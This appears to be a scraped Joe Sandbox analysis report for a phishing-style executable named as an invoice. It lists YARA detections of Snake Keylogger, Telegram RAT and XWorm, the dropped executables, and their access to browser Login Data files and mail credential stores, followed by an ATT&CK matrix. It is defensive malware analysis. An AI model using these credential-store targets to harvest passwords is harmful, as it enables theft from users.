Source: Yara match	File source: 0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HOYVjVj.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HOYVjVj.exe PID: 7680, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.0000000003716000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.00000000037CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4538875591.0000000140019000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.00000000034CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4511169630.000000000383F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003963000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4510487041.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4510340081.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bxhciy.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bxhciy.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ungagCKiEnZdl.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ungagCKiEnZdl.exe PID: 7644, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bxhciy.exe PID: 7200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ungagCKiEnZdl.exe PID: 7644, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 10.2.HOYVjVj.exe.352e4c4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.HOYVjVj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HOYVjVj.exe.352e4c4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HOYVjVj.exe.35369a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HOYVjVj.exe.35369a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2103901162.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SCS AWB and Commercial Invoice.exe PID: 7340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HOYVjVj.exe PID: 7420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HOYVjVj.exe PID: 7680, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	211 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	221 Security Software Discovery	Distributed Component Object Model	1 Email Collection	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SCS AWB and Commercial Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SCS AWB and Commercial Invoice.exe